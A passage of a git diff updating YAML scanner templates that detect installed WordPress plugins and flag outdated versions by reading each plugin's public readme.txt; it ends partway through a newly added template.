http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051549a8aa4fd8ba6136b1e8dc2d4e6f9d73bfc2296ffcb02347ad485937511ed02203a145ed8d5c5508ace0a210b8b441d5f9ef65c7901d8c7b2bedfd8c709be8a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index b859593cf4..6ff90e0902 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -1,19 +1,19 @@ id: wordpress-password-protected info: - name: Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease Detection + name: Password Protected – Password Protect your WordPress Site, Pages, & WooCommerce Products – Restrict Content, Protect WooCommerce Category, and more Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f981bdfd34fee5d9355b8376962f51ac231df6bda085c4f5e5700d8816b9e994022100a639ff8a478b8963bc52591b14312c4e227ef88d117228ab40aaa774fe7dc31f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a7f7168ac5..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eec13cdd19beb40bc9f356c958e376207eb546c8606c9b79644da90b420a92f802203392969c6cb172ea00876c61a15ab3bf184730f9fb6339a1b84652238187bdd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 913b555d12..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2f433030d6001f089298e459437dbdf56254f78fa8f80774f2a1f89e5f93dd902205ae77c99b7a4dbddbd2c591f9a68492404b5f4febb05d434450b9832dbc6652e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index b258341ab1..27e45e39ca 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -1,19 +1,19 @@ id: wordpress-pixelyoursite info: - name: PixelYourSite – Your smart PIXEL (TAG) Manager Detection + name: PixelYourSite – Your smart PIXEL (TAG) & API Manager Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090fb0b242da1befba464e7e14d1a5589a3220f2f7229c116fa428c8ef2a910ca02210081e5231563005f82d6fa833670b4f6783e6b84d720600837656f5d51ff3d9ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 6b70d31779..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f14a34686673eb531f511512b621708fa624ec4cee03755198b46b3c0c79ef7f02206567350b6aeebde9f823b2b281e959f7433b089684f34de1e71e0b09bc279f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d3f60a2a7c..d679d8df61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -1,19 +1,19 @@ id: wordpress-popup-maker info: - name: Popup Maker – Popup for opt-ins, lead gen, & more Detection + name: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dfe62e23a89573aef70131ed5452c352ecc8b08716769f4b3a0512d322026d570221009cad67d376c0c93d0db9d2d9a93c6797b1eb47396574d72c68d4c7282372bdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 2dd4d17cf7..8bfe16ca84 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -1,19 +1,19 @@ id: wordpress-post-smtp info: - name: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress Detection + name: Post SMTP – WP SMTP Plugin with Email Logs & Mobile App for Failure Alerts – Any SMTP Plus Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES, Postmark Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ce574c13b186c5e556f73b89847cf74c02bbd8ad6861fd2cc4978e00a22a73c022100f6ce760511942148852958e0bf0dea5528438a7cd3eb8f8d4cfd40c78a361ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 4c73adfa68..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220184146c4e63c23b4875b3ad6e908ee8823488d9b78a88c6cc2ff998154822db9022053a4ac0eba49559485bd43c1bbb4eb4ef9106c4b57f69a344d0a49dac91a16e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 1c51f6fe2e..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a888ae77d51d58fb510622ab1b8eb1e3c9e8e19cd4cb6020c7f6534bad42585022100b637e352422220d9dbee8b12d2a16f4425d7bb37d1f2a74b724894f25bbf7b15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index f5d05599e1..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009bd16302675b9a7d4144c8a9fdbdf91d8d8a18f2bf0d616c94e3f9ff1c8d5656022100ed0e1b8b8bbece66112cbc7c33f986a2e6289f52668cb5f31a9adf3fc63e609d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 62a8d75dce..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e522d3dd3b323914f1459891caad48fd8bc586f156ff087b2f98870c608442d4022067eefc60e167de3e9f9ce76bbe0be50ec13ef70a7c6d2d58d2e728b590de06f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 0826f67639..67968fb008 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -1,19 +1,19 @@ id: wordpress-really-simple-ssl info: - name: Really Simple SSL Detection + name: Really Simple SSL – Simple and Lightweight Security Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a67fc75ff85274d3b2c5fd6af779893e6ff397b944f25262f18d9a64d7d9ee220220358590399ab0eb9d7b751aaa97cf5b5dabd076f25cbc8a727601c6fda919e6f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 7991043ad6..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220398e6d5567c4ff9ac82b4caeb15ca8cf7e570a2582e74ba556e9aaaace6bdb570220287a4d61f59b77a0ab516d28b95ae9e9c1eef126bf7674f019a06b4119e25ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3b07653bf7..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a174f0f2aae16ca8ded4c5c76657ed6a2303be9499fbdb27ed88b7659a833f060221008d74a1a4c3385f0c14737c1add5fbcb5632e1b7c6be11f8cf7699e1e19d665a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 171664042b..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220725b255786953e7670d69bb02360a2c5e258bf5a47140099989ea5b07899b1d2022100c0d7f6ec4233df1e169079212ffe648f650d976d145d24a53a9ca6378b6e8866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml new file mode 100644 index 0000000000..d22f60a5cd --- /dev/null +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -0,0 +1,49 @@ +id: wordpress-royal-elementor-addons + +info: + name: Royal Elementor Addons and Templates Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/royal-elementor-addons/ + metadata: + plugin_namespace: royal-elementor-addons + wpscan: https://wpscan.com/plugin/royal-elementor-addons + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/royal-elementor-addons/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/royal-elementor-addons.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 142a8551ba..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025e5730967bed52cc825bd08382546422d5a7a867aa5b8bc9644d9e5069ea3460220724c5a118d1defebcd6c19f28d1488bf3fee64fded21152507038cfa1d052783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 3bc54e9fa0..2d4f463d97 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -1,19 +1,19 @@ id: wordpress-seo-by-rank-math info: - name: Rank Math SEO Detection + name: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008732d497fe4bf550cd6a077bb0505335ce46573b0777a4baa8a39c5292183f8d022021246eb7094d347d4c9c4a9b1479877fa698b3a4ddc9cddeaa230d879b3a0714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 79060a8aad..cb67671918 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -1,19 +1,19 @@ id: wordpress-sg-cachepress info: - name: Speed Optimizer – The All-In-One WordPress Performance-Boosting Plugin Detection + name: Speed Optimizer – The All-In-One Performance-Boosting Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b4837113af347f990fa7de9becd0987b37138979149a41f183b0f2b2aaec32302210085f2c4f20e986dc9dacfb9955d35e27f7dd146c222a4a939e18d2363f9b009a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 7fdcf12831..cc3eb2481a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -1,19 +1,19 @@ id: wordpress-sg-security info: - name: Security Optimizer – The All-In-One WordPress Protection Plugin Detection + name: Security Optimizer – The All-In-One Protection Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5ea4643c3313cc48b41a29413738a8b3d273f44987a52be748c940098f09b9402207d97ea4dc149cb22c9fef74530d472fe723a925d3fee9f9a3b36e8ca8e1de22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index f787f62d26..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e7b7228f182d1bcc439957ad267f9a0615819d3debe5c7b2a47b5cb64bed42c02202320892a0453e6622ff27b0f556a11c30484382e7e6af2c535246c89a03f6132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 60cbf4ffbe..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014c60ff2ece164f4475d6c8f3659d1e6269c03457e1578a8ba6e9b2b9486c133022100e18f8f5bc2d55ff34191a1943753ea8cb3a8df1b7c89e795a2f09b81ac2d97db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index f62694e599..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6db696456e8304db04c1b7451ab75840386c794681096fa728a9352c4b64134022003af60eff44417be190bb08028ca0b48f447477ebab57421cebfffdb4d9e7e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml new file mode 100644 index 0000000000..a33aa7964f --- /dev/null +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -0,0 +1,49 @@ +id: wordpress-simple-history + +info: + name: Simple History – Track, Log, and Audit WordPress Changes Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/simple-history/ + metadata: + plugin_namespace: simple-history + wpscan: https://wpscan.com/plugin/simple-history + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/simple-history/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/simple-history.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index fe5a5d0714..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae832b8d695dbb02fe2e270bc8d52ffed9ff9ffb4968062096aae91536d0d925022100e0856c2bb6575a257f4964f33be808b47404aee3cd0749f1649baa3ebb009338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 1214d53169..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069c779239c1c570f2c08ad979f7d53fda34ad47ffbea564c10ea0e671c8a754002207d7cb64d5e1686ddfe3a9fbba6731da08d109df11115f29fe3df219cfd4e7f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9c39e3c0d2..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207cb4a9a9df43d723704267a3310b980e38bf74d730b6f1328bb9293469538776022100f895e8ccae1ac23b76956a3e2d5e67b59b9f1209cfe94a7564c17c0f2eac47f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index eca02b473e..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220220e08a15ab63e4f3b6114774461934535265654cce02f1b576ff3aa64c70f76022100d170dfe84866f1cfd21c85464f6b11db411d084ab756b8c703058a4b0273c000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml new file mode 100644 index 0000000000..7776b209df --- /dev/null +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -0,0 +1,49 @@ +id: wordpress-sticky-header-effects-for-elementor + +info: + name: Sticky Header Effects for Elementor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/sticky-header-effects-for-elementor/ + metadata: + plugin_namespace: 